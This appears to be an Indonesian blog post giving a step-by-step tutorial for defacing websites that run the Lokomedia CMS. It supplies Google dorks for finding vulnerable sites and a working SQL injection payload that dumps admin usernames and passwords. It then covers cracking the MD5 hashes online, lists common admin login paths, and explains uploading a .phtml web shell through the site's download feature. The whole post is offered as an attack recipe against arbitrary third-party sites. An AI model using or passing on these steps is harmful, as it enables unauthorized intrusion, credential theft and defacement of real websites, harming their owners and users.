Deface Metode SQLi LokoMedia

Deface Metode SQLi LokoMedia





Baiklah Kali ini saya akan Memberikan tutorial cara deface metode SQLi Lokomedia

Pertama kalian siapkan

- Laptop/pc yang terhubung di Internet...hehehe jelas lah :v
- Kopi/Teh Dan Cemilan :v
- Shell yang berekstensi .phtml

Dork Nya :

inurl:statis-1-profil.html
inurl:statis-2-profil.html
inurl:statis-3-strukturorganisasi.html
inurl:statis-1-visimisi.html
inurl:statis-1-tujuan.html



Lalu Kalian Pilih salah satu web yg akan kalian deface,,lalu masukkan exploit nya 

'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+

Cara Masukin Exploit Nya ===> Contoh: www.sitetarget.com/statis-3(masukkan explot nya disini)-strukturorganisasi.html

Dan Jadinya akan seperti ini



Lalu Kalian Tekan CTRL + U untuk melihat user dan password si target
Maka Jadinya Akan Seperti Ini


Nah Sekarang User Dan Password Si Target Sudah Terlihat..Password Si korban Masih Dalam Bentuk Md5..Jadi,kalian harus decrypt dulu password nya..Cara decrypt nya,kalian menggunakan Hashkiller Atau md5online.org

Link Nya

===>  HashKiller

===> Md5Online


Nah Sekarang Gua dapat Password Nya..Tinggal Kalian Login


Untuk login biasanya di

/redaktur
/adminweb
/administrator
/redaktur/index.php
/adminlogin
/admin
/login.php

JIKA WEB NYA GAK VULN MAKA KALIAN HARUS CARI WEB LAIN,,HIHIHIHI :v :v :v

Kali ini Gua login Di /adminweb



Jika Login Berhasil,,Maka Hasil Nya Akan Seperti Ini


Setelah Itu Kalian Upload Shell Kalian Yang Berektensi .phtml Di bagian Download

Lalu Kalian Klik Tambah Download,,Lalu Upload Shell Kalian



Karena Saya Gak Nebas Index,,Jadi Saya Hanya Mengupload Script Deface Saya

JAGA WEB INDONESIA BRO,HIHIHI :V :V :V

Jika Selesai Mengupload Shell Kalian,,Maka Kalian Akses Shell Kalian Dengan Cara

Contoh: www.sitetarget.com/files/namashellkalian.phtml

DAN HASIL NYA!!!!!




Masih Kurang Paham??,,Silahkan Lihat Video Nya :





OKE SEKIAN DARI SAYA..JIKA ADA KEKURANGAN MOHON DI MAAFKAN

Postingan terkait:

Belum ada tanggapan untuk "Deface Metode SQLi LokoMedia"

Post a Comment